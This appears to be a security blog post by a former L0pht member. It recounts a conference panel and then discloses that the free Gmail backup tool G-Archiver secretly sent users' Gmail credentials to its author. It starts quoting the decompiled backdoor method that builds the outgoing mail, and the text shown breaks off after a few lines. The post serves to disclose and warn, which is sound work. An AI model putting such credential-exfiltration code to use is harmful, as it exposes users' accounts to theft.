I took part in the L0pht Reunion Panel at the Source Boston conference in Cambridge, MA last Friday. It was a lot of fun to get back together with the “band” and pontificate with no holds barred about the latest security threats, just like we did in the old days.

One of the questions asked of the panel by moderator Michael Fitzgerald (who did a kick-ass job) was, “What scares you the most these days?”. My answer was the proliferation of of inexpensive digital devices made in China that we plug into our computers. …

Here is another data point that simple backdoors are being placed into free applications. A programmer, Dustin Brooks, was inspecting a free Gmail backup utility, called G-Archiver, with Reflector and noticed that not only did it have the authors Gmail credentials baked in, but is was sending the Gmail credentials of every user of the program to the author.

This is an example of an unintended network activity backdoor where information leakage occurs. Here is the code:

public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
…